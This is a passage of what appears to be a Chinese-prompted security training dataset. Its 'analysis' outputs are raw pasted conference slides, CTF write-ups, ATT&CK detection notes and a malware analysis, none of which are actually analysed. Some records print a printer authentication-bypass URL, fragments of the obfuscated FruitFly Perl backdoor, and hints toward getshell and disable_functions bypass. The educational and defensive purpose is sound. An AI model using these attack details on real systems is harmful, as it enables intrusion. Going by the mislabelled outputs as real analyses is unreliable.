系统应用指导原则最佳实践  端到端工具链相互联通&整合 提高企业的营收利润及市场占有率 软件全生命周期的闭关敏捷开发持续交付技术运营 技术 手段 效果 原则 13 DevOps软件分布图 14 DevOps下我们的安全是如何做的 牵一发而动全身 高效 敏捷 持续 X X X 开发测试 安全人员 运维人员 上线后发现 安全问题 15 我们损失的不止是时间 研发阶段 研发阶段发现的漏洞可以由开发直接FIX成本低 效率高 测试阶段 测试阶段发现的漏洞由测试提交给研发需要一 定的沟通成本相对来说FIX的效率较高 发布阶段 发布到线上后检测出的漏洞需要安全人员给出方 案与研发人员沟通由测试人员验证也需要承 受一定可能性的线上风险相对成本较高 运行阶段 运行一段时间后被白帽子或监管报告发现的漏洞 需要付出额外的金钱沟通成本高需要再FIX的 时间需要运维发布的介入修复成本成倍数的 上升给企业带来相当大的风险和成本压力 研发 研发 测试 研发 测试 运维 安全 产品 研发 测试 运维 安全 产品 业务 公关 老板 x1 x2 x10 x100 100倍 16 何为DevSecOps? 来自 Gartner 研究公司的分析师 David Cearley 认为当今的 CIO或者 CSO 应该修改 DevOps 的定义使之包括安全理念他称之为 DevSecOps 它是糅合了开发安全及运营理念以创建解决方案的全新方法 17 DevSecOps与DevOps的区别? 安全重心的思路转变 SEC Devops时代安全团队的尴尬 Devops 快速的迭代和发布过程中安全 因为缓慢节奏被弃在一旁整个流程中没 有安全质量的考虑和控制安全团队也对 安全质量无计可施 建设人人都对安全负责的DEVSECOPS 企业建设人人", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFROM PRINTER TO PWND Leveraging Multifunction Printers During Penetration Testing INTRODUCTION  From Dayton Ohio region  Last 18 years in IT  10 year in security  3 of those as a security penetration tester  Member of foofus.net team  3rd time presenting at Defcon w00t! AGENDA  Multi function printer features  Multi function printer security  Attacking multi function printer devices  Leveraging these attacks during pentesting  Development of an automated harvesting tool  Conclusion & Question MULTI FUNCTION PRINTER FEATURES MULTI FUNCTION PRINTER FEATURES  Scan to File  Window file server access  FTP server access  Scan to Email  Email server SMTP access  Email Notification  Email server SMTP access MULTI FUNCTION PRINTER FEATURES  LDAP authentication services  User address books  System logging  Remote functionality  Backup/cloning MULTI FUNCTION PRINTER SECURITY MULTI FUNCTION PRINTER SECURITY Four steps to security failure  Roll it in and power it up  Integrate with business systems  Passwords  No password set  Factory default setting  No patch management ATTACKING MULTI FUNCTION PRINTER DEVICES ATTACKING MULTI FUNCTION PRINTERS  Why  Gather information  Escalation rights into other core systems  When  If exposed to internet  Once you gain a foot hold into internal network ATTACKING MULTI FUNCTION PRINTERS  How  Leveraging default password  Access bypass attacks  Information leakage attacks  Forceful browsing attacks  Backup/cloning functions  Passback attack MFP SECURITY BYPASS ATTACK  The ability to bypass authentication on a device by passing various forms of data in the URL  Toshiba  HP /TopAccess/Administrator/Setup/ScanToFile/List.htm Redirects to /TopAccess/Administrator/Login/Login.htm TOSHIBA BYPASS ATTACK /TopAccess//Administrator/Setup/ScanToFile/List.htm TOSHIBA BYPASS ATTACK HP OFFICEJET BYPASS ATTACK DEMO MFP INFORMATION LEAKAGE ATTACKS  MFP devices exposing data unintentionally. Data of value can typically be extracted from web page source code.  T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Rot (Crypto) Another ciphertext-only challenge. This time, ciphertext is even shorter: ``` 5?5?6B0a_`gL:d=6a!|vBc<<A=q>YA8|#A=Urr6t{\"N ``` We immediately can infer *something* about the encryption, because we know that `scsctf_2017{` encrypts to ```5?5?6B0a_`gL```. The same input characters encode to the same output characters, so this is a substitution cipher. The challenge title and description suggested `rot` operation. Alas, there are no obvious patterns in: ```python mapping = { '5': 's', '?': 'c', '6': 't', 'B': 'f', '0': '_', 'a': '2', '_': '0', '`': '1', 'g': '8', 'L': '{', 'N': '}', } ``` But we compute differences between ASCII values of various characters: ```python for k, v in mapping.iteritems(): print v, ord(v) - ord(k) ``` The result is quite regular: ``` f 36 { 47 } 47 0 -47 2 -47 1 -47 8 -47 _ 47 s 62 t 62 c 36 ``` Now, as I've said, we hate guessing. So we decided to approach this problem methodically, instead of getting into the task author's head. One of my teammates noticed that there are only a few possible differences for ASCII values. So he tried subtracting `[36, 47, -47, 62]` from every ciphertext character, and written down all printable results at every position: ``` scsctf_2018{i5at2EMGf4kkeaBb*egMGea&CCtELF} x l P zzpl m}pv Rply Q a ``` According to that, for example, there are only two candidates for the character after `{`, etc. My other teammate deduced that since this is a substitution cipher and there is clearly a lot of structure in the transformation, it should be possible to guess the blanks in the sbox. His proposition was: ```python rot = '5?5?6B0a_`gL:d=6a!|vBc<<A=q>YA8|#A=Urr6t{\"N' out = ''' !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]_`abcdefghijklmnopqrstuvwxyz{|}~''' inn = '''OPQRSTUVWXYZ[\\]_`pqrstuvwxyzabcdefghijklmno{|}~!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMN ''' from string import maketrans m = maketrans(out, inn) print rot.translate(m) ``` This prints `scsctf_2018{x5at2PMGf4zzeaBb*evMRea&CCtE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYour Goal: Be a Harder Target Many of the same risks apply U.S. v. Schaffer suspect should know If I were your lawyer, Id advise you not to answer that tweet. directly to any individuals forums known to support or promote illegal activity consider disabling comments Authorship Analysis in Cybercrime Investigation", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1564-003-windwos-隐藏窗口 ## 来自ATT&CK的描述 攻击者可以使用隐藏的窗口将恶意活动隐藏在用户的视线范围之外在某些情况下可以隐藏通常在应用程序执行操作时显示的窗口系统管理员可以利用它来避免在执行管理任务时破坏当前用户的工作环境 在Windows上Windows中的脚本语言具有多种功能例如PowerShellJscript和Visual Basic可以隐藏窗口一个典型示例就是powershell.exe -WindowStyle Hidden 同样在macOS上属性列表plist文件中列出了应用程序运行方式的配置这些文件中的标记之一可以是apple.awt.UIElement它允许Java应用程序阻止应用程序的图标出现在Dock中常见的用法是当应用程序在系统托盘中运行但又不想显示在Dock中时 攻击者可能滥用这些功能以向用户隐藏其他可见的窗口从而不会提醒用户系统上的攻击者活动 ## 测试案例 暂无可参考相关文章传送门<https://zhuanlan.zhihu.com/p/25226349> ## 检测日志 windows sysmon ## 测试复现 可参考测试案例中相关文章 ## 测试留痕 windows sysmon ## 检测规则/思路 监视进程和命令行参数是否有指示隐藏窗口的操作在Windows中启用并配置事件日志记录和PowerShell日志记录以检查隐藏的窗口样式在MacOS中plist文件是具有特定格式的ASCII文本文件因此它们相对容易解析文件监视可以检查plist文件中的apple.awt.UIElement或任何其他可疑的plist标记并对其进行标记 ### splunk规则 ```yml index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 Image=*\\\\powershell.exe CommandLine=*-WindowStyle Hidden*) ``` ### 建议 如上检测规则存在一定的局限性可根据自己的实际情况不断的更新要监视的命令行参数当然powershell日志也可以做到对命令行参数的记录也可通过powershell日志进行检测 ## 参考推荐 MITRE-ATT&CK-T1564-003 <https://attack.mitre.org/techniques/T1564/003/> PowerShell 安全专题之攻击检测篇 <https://zhuanlan.zhihu.com/p/25226349>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle OFFENSIVE MALWARE ANALYSIS dissecting osx/fruitfly via a custom c&c server WHOIS leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT devices and infrastructure endpoints security for the 21st century @patrickwardle OUTLINE fruitfly monitoring c&c server tasking trapping flies analyze OSX/FruitFly.B ...'smartly' THE GOAL command description 0 \"take screen shot\" 1 ? 2 ? \"execute command #0\" malware's commands build: custom C&C server spy.com steal (borrow?) other ppls access 1 task: the malware observe: the response 2 3 cmd #0 malware hijack OSX/FRUITFLY an intriguing backdoor initially discovered by malwarebytes OSX/FRUITFLY (QUIMITCHIN) \"New Mac backdoor using antiquated code\" -malwarebytes/thomas reed components (script, binary, etc) persistence (launch agent) capabilities } Virus Total submission(s) Jan 11th (0 detections) files procs cam mouse keys infection vector? trojan? email? method of persistence OSX/FRUITFLY $ cat ~/Library/LaunchAgents/ com.client.client.plist <?xml version=\"1.0\" encoding=\"UTF-8\"?> <!DOCTYPE plist PUBLIC  > <plist version=\"1.0\"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>com.client.client</string> <key>ProgramArguments</key> <array> <string>/Users/user/.client</string> </array> <key>RunAtLoad</key> <true/> <key>NSUIElement</key> <string>1</string> </dict> </plist> [RSA 2015, wardle] \"Malware Persistence on OS X\" launch agent persistence } launch agent property list: ~/Library/LaunchAgents/ com.client.client.plist payload: ~/.client BlockBlock alert variant b OSX/FRUITFLY.B $ file fpsaud perl script text executable, ASCII text $ cat fpsaud #!/usr/bin/perl use strict;use warnings;use IO::Socket;use IPC::Open2;my$l;sub G{die if!defined syswrite$l,$_[0]}sub J{my($U, $A)=('','');while($_[0]>length$U){die if! sysread$l,$A,$_[0]-length$U;$U.=$A;}return$U;} sub O{unpack'V',J 4}sub N{J O}sub H{my$U=N; $U=~s/\\\\/\\//g;$U}sub I{my$U=ev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRob Havelt - Director of Penetration Testing, Trustwave SpiderLabs Wendel G. Henrique  Security Consultant, Trustwave SpiderLabs Copyright Trustwave 2010 Confidential BIO SpiderLabs:~ Trustwave$ whois RHavelt  Director of Penetration Testing at Trustwaves SpiderLabs.  Over 18 years in the security industry.  He has worked with offensive security seemingly forever, and from running a start-up ISP, to working as a TSCM specialist, he's held just about every job possible in the realm of system administration and information security.  Formerly a bourbon-fueled absurdist, raconteur, and man about town, currently a sardonic workaholic occasionally seeking meaning in the finer things in life  Rob is, and will always be, a career hacker.  Given Talks at Toorcon, Black Hat, Thotcon, BSides. Copyright Trustwave 2010 Confidential BIO SpiderLabs:~ Trustwave$ whois WendelGH  Security consultant (Penetration Test Team) at Trustwaves SpiderLabs.  Over 9 years in the security industry.  Co-authored patent-pending penetration testing technology.  Spoke in Black Hat Arsenal 2010 (USA), OWASP AppSec Research 2010 (Sweden) and Black Hat Europe 2010 (Spain). Previously, Wendel spoke in Troopers 09 (Germany), OWASP AppSecEU09 (Poland), YSTS 3.0 (Brazil), and has spoken in well known security conferences such as DEFCON 16 (USA) and H2HC (Brazil).  Discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications. Copyright Trustwave 2010 Confidential First Thing First  Up here there is a Server. Its connected to a WiFi Network. In Fact there are 2 WiFi networks in here.  We will be logging into this server as root at least every 5 min during this talk. Possibly more frequently.  Whomever can give us the root password for this server before the end of this talk gets one of these spiffy T-Shirts.  There are two ways we know should work to accomplish t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRESTing On Your Laurels Will Get You Pwned By Abraham Kang, Dinis Cruz, and Alvaro Muñoz Goals and Main Point  Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.  Remember that a REST API is nothing more than a web application which follows a structured set of rules.  So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc.  If you have both publically exposed and internal REST APIs then you probably have some remote code execution and data exfiltration issues. Causes of REST Vulnerabilities  Location in the trusted network of your data center  History of REST Implementations  Self describing nature  Input types and interfaces  URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)  Inbred Architecture  Extensions in REST frameworks that enhance development of REST functionality  Reliance on incorrectly implemented protocols (SAML, XML Signature, XML Encryption, etc.)  Incorrect assumptions of application behavior Application Architecture Background FW Internet BH2 FW AS2 SAP FW Internet BH5 FW AS5  FW Internet BH4 FW AS4 ERP FW BH1 FW AS1 Oracle FW Internet BH3 FW AS3 MS SQL Internet Mongo Couch Neo4j Cassan LDAP/ AD HBase EAI EII ESB Http Protocol (proprietary protocols are different colors)  Internal Network of a Data Center What are the characteristics of an Internal Network (BlueNet, GreenNet, Trusted Network)? AS2 SAP AS5  AS4 ERP AS1 Oracle AS3 MS SQL Mongo Couch Neo4j Cassan LDAP/ AD HBase EAI EII ESB  Internal Network of a Data Center What are the characteristics of an Internal Network (BlueNet, GreenNet, Trusted Network)?  Connectivity Freedom (within the trusted network)  Increased Physical Safe guards  Hardened Systems at the OS level  Shared Services and Infrastructure AS2 SAP AS5  AS4 ERP AS1 Oracle AS3 MS SQL Mongo Couch Neo4j Cassan LDAP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Dam (Crypto, 277p) ###ENG [PL](#pl-version) In the task we get access to a service providing some form of encryption. The server challenges us for a PoW before we can interact, so first we had to solve the PoW, but it was the same as for some others tasks (prefix for string giving some hash value). After beating the PoW we could query the server for encryption code, key generation code, encrypted flag with current session key, current public session key and we could also encrypt something. The encryption code is: ```python def encrypt(msg, pubkey): n, g, u = pubkey u += 1 r = getRandomRange(1, n ** u - 1) enc = pow(g, msg, n ** u) * pow(r, n ** u, n ** u) % n ** u return enc ``` It looked very much like Paillier Cryptosystem so a little googling told us that this is actually a generalized version known as DamgårdJurik Cryptosystem: https://en.wikipedia.org/wiki/DamgårdJurik_cryptosystem It looks almost as the textbook implementation so we didn't expect vulnerability here. The key generation scheme was: ```python def get_keypair(kbit, u): l = getRandomRange(kbit >> 4, kbit) p = long(gmpy.next_prime(2 << l)) q = long(getPrime(kbit - l - 1)) n = p * q d = (p - 1) * (q - 1) / GCD(p - 1, q - 1) r = getRandomRange(1, n - 1) while True: t = getRandomRange(1, n - 1) if GCD(t, n) == 1: break g = pow(n + 1, t, n ** (u + 1)) * r % n ** (u + 1) pubkey = (n, g, u) privkey = (n, d) return pubkey, privkey ``` At first glance it also looked fine, but after a while we noticed an interesting issue. The estimated `kbit` value, judging by some public keys we got, was just 512 bits. This means that `kbit >> 4` is actually `32`! So the range for the first prime is between 32 and 512 bits, and for the second prime between 0 and 479 bits! This doesn't sound very safe, when the primes are not similar in size. Since for every connection we get a new key, we can expect that at some point we will get a key with reasonably small factor. For this we wrote a script to grab some public keys and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE KEY RECOVERY ATTACKS AGAINST COMMERCIAL WHITE BOX CRYPTOGRAPHY IMPLEMENTATIONS SANGHWAN AHN(H2SPICE), LINE CORPORATION AGENDA  Introduction  WHITE-BOX CRYPTOGRAPHY  White-box Cryptanalysis  Conclusion INTRODUCTION CRYPTO SYSTEM IN THE SOFTWARE 0 1 0 1 1 1 1 0 1 0 1 1 0 1 0 1 WHITE-BOX THREAT MODEL  Binary is completely visible to an attacker  Attacker has full access to the cryptography algorithm  Attacker has full control over its execution environment  Unlimited amount of queries  Trusted execution environment(TEE)  ARM Trustzone, Intel SGX, AMD Memory Encryption  Its almost safe, but not many supported devices (mostly latest devices)  White-box cryptography(WBC)  All academic WBC solutions have been broken  No attack has been observed to date on commercial WBC SECURE ELEMENT WHITE-BOX CRYPTOGRAPHY SubBytes Key WBC ShiftRows MixColumns AddRoundKey PlainText CipherText CipherText PlainText WHITE-BOX AES IMPLEMENTATION Sbox ( x  key ) Key Input x Tbox KEY PARTIAL EVALUATION unsigned int Tboxes[9][16][256] = { /*First Round, K[0] is 0x6c*/ { 0xf05050a0, 0x443c3c78, 0xba9f9f25, 0xe3a8a84b, 0xcf45458a, 0x10f9f9e9, 0x06020204, 0x817f7ffe, 0xc5434386, 0xd74d4d9a, 0x55333366, 0x94858511, 0x6bd0d0bb, 0x2aefefc5, 0xe5aaaa4f, 0x16fbfbed, 0x30101020, 0x1affffe5, 0x0ef3f3fd, 0x6dd2d2bf, 0xdfbcbc63, 0xc1b6b677, 0x75dadaaf, 0x63212142, 0xad92923f, 0xbc9d9d21, 0x48383870, 0x04f5f5f1, 0xf35151a2, 0xfea3a35d, 0xc0404080, 0x8a8f8f05, 0x7b292952, 0x3ee3e3dd, 0x712f2f5e, 0x97848413, 0xf65252a4, 0x4d3b3b76, 0x61d6d6b7, 0xceb3b37d, 0x2d1b1b36, 0xb26e6edc, 0xee5a5ab4, 0xfba0a05b, 0x1b090912, 0x9e83831d, 0x742c2c58, 0x2e1a1a34, 0xde4a4a94, 0xd44c4c98, 0xe85858b0, 0x4acfcf85, 0xbe6a6ad4, 0x46cbcb8d, 0xd9bebe67, 0x4b393972, 0x60202040, 0x1ffcfce3, 0xc8b1b179, 0xed5b5bb6, 0xf55353a6, 0x68d1d1b9, 0x00000000, 0x2cededc1, 0x937171e2, 0x73d8d8ab, 0x53313162, 0x3f15152a, 0x5c343468, 0xf4a5a551, 0x34e5e5d1, 0x08f1f1f9, 0x5a36366c, 0x413f3f7e, 0x02f7f7f5, 0x4fcccc83, 0xc2b7b775, 0x1cfdfde1, 0xa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPersonal Survival Preparedness Copyright 2009 Steve Dunker Las Vegas Survival Scenario  Aug 1st 2009 -- 2 Million People  Dec 1st 2009  100,000 people  Can you Survive? Basic Survival Needs Air Water Food Enviroment Detailed Basic Needs  The physiological needs include the needs we have for oxygen, water, protein, salt, sugar, calcium, and other minerals and vitamins. They also include the need to maintain a pH balance (getting too acidic or base will kill you) and the need for a body temperature 98.6 (or near to it). Also, theres the needs to be active, to rest, to sleep, and the need to get rid of wastes (CO2, sweat, urine, and feces). Water  Daily Need  Contamination concerns  Unconventional sources Food  Sources  Contamination  Unconventional sources Minerals and Vitamins  Salt  Vitamins Survival SnapShot What do you have on you (or close by) that will help you survive? The Disaster Environment  Working together 1-4 hours  +4 hours chaos starts Firearms From the Net  Disclaimer: Check your Local and State Laws  Disclaimer: Crime and Guns = Hard time  Most States allow firearm purchases from the Internet  Federal Law requires Federal Firearms License unless it is an Antique gun. (Pre-1899) C&R License  BATF issues Federal Firearm Licenses  C&R = Curio and Relic  BATF Type 3 License  Licensed collector of Curio & Relic (C&R) firearms  $30 for 3 years  4 page application & Fingerprints C&R Guns  Firearms which were manufactured more than 50 years prior to the current date, but not including replicas thereof;  Firearms which are certified by the curator of a municipal, State, or Federal museum which exhibits firearms to be curios or relics of museum interest; and  Any other firearms which derive a substantial part of their monetary value from the fact that they are novel, rare, bizarre, or because of their association with some historical figure, period, or event. . C & R Examples  World War Two Weapons - M1 Garand - K98 Mauser  Some cold war weapons - Some SKS - Wa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWHITE PAPER  2015 IOActive, Inc. All Rights Reserved Abusing XSLT for Practical Attacks White Paper Fernando Arnaboldi IOActive Senior Security Consultant Abstract Over the years, XML has been a rich target for attackers due to flaws in its design as well as implementations. It is a tempting target because it is used by other programming languages to interconnect applications and is supported by web browsers. In this talk, I will demonstrate how to use XSLT to produce documents that are vulnerable to new exploits. XSLT can be leveraged to affect the integrity of arithmetic operations, lead to code logic failure, or cause random values to use the same initialization vector. Error disclosure has always provided valuable information, but thanks to XSLT, it is possible to partially read system files that could disclose service or system passwords. Finally, XSLT can be used to compromise end-user confidentiality by abusing the same-origin policy concept present in web browsers. This document includes proof-of-concept attacks demonstrating XSLT potential to affect production systems, along with recommendations for safe development.  2015 IOActive, Inc. All Rights Reserved. [2] Contents Abstract ......................................................................................................................... 1 Introduction ................................................................................................................... 3 Processors ............................................................................................................................. 3 Gathering information about your target ................................................................................. 4 Obtaining the current path ...................................................................................................... 6 Loss of Precision with Large Integers ........................................................................... 8 Loss of Precision with Rea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# mus1c General Skills, 300 points ## Description: > I wrote you a song. Put it in the picoCTF{} flag format ``` Pico's a CTFFFFFFF my mind is waitin It's waitin Put my mind of Pico into This my flag is not found put This into my flag put my flag into Pico shout Pico shout Pico shout Pico My song's something put Pico into This Knock This down, down, down put This into CTF shout CTF my lyric is nothing Put This without my song into my lyric Knock my lyric down, down, down shout my lyric Put my lyric into This Put my song with This into my lyric Knock my lyric down shout my lyric Build my lyric up, up ,up shout my lyric shout Pico shout It Pico CTF is fun security is important Fun is fun Put security with fun into Pico CTF Build Fun up shout fun times Pico CTF put fun times Pico CTF into my song build it up shout it shout it build it up, up shout it shout Pico ``` ## Solution: This song has the very slight scent of a programming language, and indeed, searching for [\"shout\" \"put\" programming language](https://www.google.com/search?q=%22shout%22+%22put%22+programming+language) brings us to a language called [Rockstar](https://codewithrockstar.com/). > Rockstar is a computer programming language designed for creating programs that are also hair metal power ballads. Pasting the program into the [online interpreter](https://codewithrockstar.com/online), we get the following output: ``` 114 114 114 111 99 107 110 114 110 48 49 49 51 114 ``` This looks like ASCII, let's decode it: ```python >>> ascii = \"\"\"114 ... 114 ... 114 ... 111 ... 99 ... 107 ... 110 ... 114 ... 110 ... 48 ... 49 ... 49 ... 51 ... 114 ... \"\"\" >>> for c in ascii.split(): ... print(chr(int(c)), end='') ... rrrocknrn0113r >>> ``` So the flag is `picoCTF{rrrocknrn0113r}`.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# re5 (re, 100pts) ``` michal@DESKTOP-U3SJ9VI:/mnt/c/Users/nazyw/Downloads$ file reverse.exe reverse.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows ``` A .Net executable, should be fun! Let's use ILSpy: ![decompilation](decompilation.png) The decompilation is pretty clear: Our input is firstly encrypted using the `Enc` function: ```c++ string text = tb_key.Text; string a = Enc(text, 9157, 41117); ``` If the output matches the hardcoded string, we win: ```c++ if (a == \"iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ=\") { MessageBox.Show(\"Correct!! You found FLAG\"); } else { MessageBox.Show(\"Try again!\"); } ``` ```c++ public static string Enc(string s, int e, int n) { int[] array = new int[s.Length]; for (int i = 0; i < s.Length; i++) { array[i] = s[i]; } int[] array2 = new int[array.Length]; for (int i = 0; i < array.Length; i++) { array2[i] = mod(array[i], e, n); } string text = \"\"; for (int i = 0; i < array.Length; i++) { text += (char)array2[i]; } return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); } public static int mod(int m, int e, int n) { int[] array = new int[100]; int num = 0; do { array[num] = e % 2; num++; e /= 2; } while (e != 0); int num2 = 1; for (int num3 = num - 1; num3 >= 0; num3--) { num2 = num2 * num2 % n; if (array[num3] == 1) { num2 = num2 * m % n; } } return num2; } ``` The `Enc` function iterates over every letter and performs the following operation on it: `array2[i] = mod(array[i], e, n);` Since `mod` is just modular exponentiation, the encryption boils down to encrypting each letter using rsa with e=`9157` and n=`41117` we can just decrypt it using the calculated private key: ```python from base64 import b64decode def egcd(a, b): if a == 0: return (b, 0, 1) else: g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def modinv(a, m): g, x, y = egcd(a, m) if g != 1: raise Exception('modular inverse does not exist') else: return x % ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Mobile Devices Analysis Using JTAG and Chip-off Forensics Ninja Who am I  Captain a.k.a Forensics Ninja  Research since 2010  Facebook Forensics (2011) on Hakin9 Magazine  Mac Memory Forensics (2014) on Digital Forensics Magazine  Investigation and Intelligence Framework (2015) on Forensics Focus  Advanced Mobile Devices Analysis Using JTAG and Chip-Off (2016) Speaker@  SANS DFIR  DefCON 20  HITCON  AVTokyo  APWG  HTCIA  VXCON Agenda  Introduction to JTAG and Chip Off  Analysis on JTAG and eMMC dump  Demo Training Course  TeelTech Advanced JTAG / Chip-Off Mobile Forensics  Cellebrite JTAG Extraction and Decoding  H11 JTAG Data Recovery and Mobile Phone Repair  XRY Advanced Acquisition Training  viaforensics (NowSecure) until 2012  Course Fee around USD4,000 Why JTAG / Chip-Off?  Physical vs Logical vs Forensics tools  Bricked  Locked without debugging mode  Damaged  Special cases What is JTAG?  Joint Test Action Group  Test Access Ports (TAPs) to collect raw data from a memory chips  Not chip-off and ISP  Extreme physical data acquisition  Advanced technique  Soldering and De-soldering Price lists  Source from NowSecure  US dollars  JTAG Box JTAG Finder Mounting Frame & Arms BGA (eg 162 or 169)   Ball Grid Array TAP  TCK  test clock  TMS  test mode state  TDI  test data in  TDO  test data out  TRST  test reset  NRST  normal reset  RTCK  return clock  GND  ground  JTAG Pinout JTAG Molex and Jig Demonstration using Riff Box  HTC EVO 3G  Android OS Demonstation using Riff Box  Lumia 620  Windows 8 OS Acquisition of the Flash Rom Retrieved Data from phone Decoding the Lock Pattern  gesture.key  20 bytes in length  open source tools Gesture.key What is Chip-Off?  eMMC chip  NAND Flash  Disassemble & Re-balling  Heating Machine / Stand eMMC Programmer & Adapters eMMC Box EPR Box & BGA 169e adaptor Demonstration Belkasoft Evidence Center UFED Physical Analyzer HITCON Training (Wish)  November 2016  One Day (6 hours) Question? forensicsninja@gmail.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMaking Games Cerebral Ne0nRa1n Julian Spillane, CEO, Frozen North Productions, Inc. Breakdown Who are these brain people? Brain 101 Video Game Myths History of Game Peripherals Industry Current Trends (The Good and The Bad) Our Proposal... Demonstration Who are these brain people? Ne0nRa1n UnderEducated UnderQualified Visionary dancing monkey extraordinaire Julian Spillane CEO, Frozen North Productions, Inc. Chair, Toronto Independent Games Conference Obsessed with strange and innovative peripherals and interfacing them with games... Or, The Stuff Youve Forgotten from Psych Class What is the brain? 1 second summary: Organic Cellular Goodness http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human-brain.html What, exactly, does it do? 1 second summary: Encoding, Storage, Retrieval http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human-brain.html How do memories work? 1 second summary: Neurons That Fire Together, Wire Together http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human-brain.html How do we think? 1 second summary: PatternMatching Puzzle Pieces http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human- brain html What About Dreams? 1 second summary: Ill Tell You What They Are, But Dont Ask Me Why We Have Them http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human-brain.html What about consciousness? 1 second summary: The Questionable Question http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human- brain html How is my Brain Different From a Monkey? 1 second summary: Bigger and Better http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human-brain.html Why Do Drugs Feel So Good? 1 second summary: The Doppelgangers of Desire http://www.newscientist.com/channel/being-human/brain/dn9970-faq-the-human- brain html How Does This Relate To Games? 1 second summary: Repetition of Task = Mastery of Task Or, Jack Thompsons Wet Dream Myth ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# phpinfo --- **相关文章** - [phpinfo 可以告诉我们什么](http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/) - [PHPINFO 中的重要信息](https://www.k0rz3n.com/2019/02/12/PHPINFO%20%E4%B8%AD%E7%9A%84%E9%87%8D%E8%A6%81%E4%BF%A1%E6%81%AF/) - [amazing phpinfo() ](https://skysec.top/2018/04/04/amazing-phpinfo/) - [phpinfo 中值得注意的信息](https://seaii-blog.com/index.php/2017/10/25/73.html) - [php中函数禁用绕过的原理与利用](https://mp.weixin.qq.com/s/_L379eq0kufu3CCHN1DdkA) **相关工具** - [proudwind/phpinfo_scanner](https://github.com/proudwind/phpinfo_scanner) - 抓取 phpinfo 重要信息 - 我这里运行报错,解决方法是把15行的3个 nth-child 改为 nth-of-type --- ## 版本号 最直观的就是php版本号虽然版本号有时候会在响应头中出现 找相应版本存在的漏洞 --- ## DOCUMENT_ROOT 取得网站当前路径 --- ## disable_functions disable_functions 顾名思义函数禁用 如一些ctf题会把disable设置的极其恶心这里要使用一些 bypass 的技巧 --- ## open_basedir 该配置限制了当前 php 程序所能访问到的路径 --- ## opcache 如果使用了opcache那么可能达成getshell但需要存在文件上传的点 - https://www.cnblogs.com/xhds/p/13239331.html --- ## allow_url_include 文件包含相关 --- ## allow_url_fopen 文件包含相关 --- ## short_open_tag 短标签 --- ## Server API 是否可用 PHP-FPM 绕过 disable_function", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 1 A journey from high level languages, through assembly, to the running process https://github.com/hasherezade/malware_training_vol1 Running executables: process Process: basics Process  When we run an EXE file, the system creates a Process Process  A process is a container for all the resources that the application needs to run  A process by itself doesnt run code: threads execute it  Each process has its own, private address space, that is independent from other processes (different processes may have different memory content at the same addreses)  Has its own access token, defining its security context Process  Types of processes on Windows:  System process  Subsystem process  Service  User processes (our applications) Processes on Windows From: Windows Kernel Programming by Pavel Yosifovich Process  A process is identified by its PID (Process ID)  unique throughout the system at the time of running  after the process terminates, its PID may be reused by a new process  Each process has one or more threads. They are identified by Thread IDs.  Thread IDs, same as process IDs, are unique throughout the system  After the thread terminates, its ID may be reused  Processes may access each other (via handles), if their 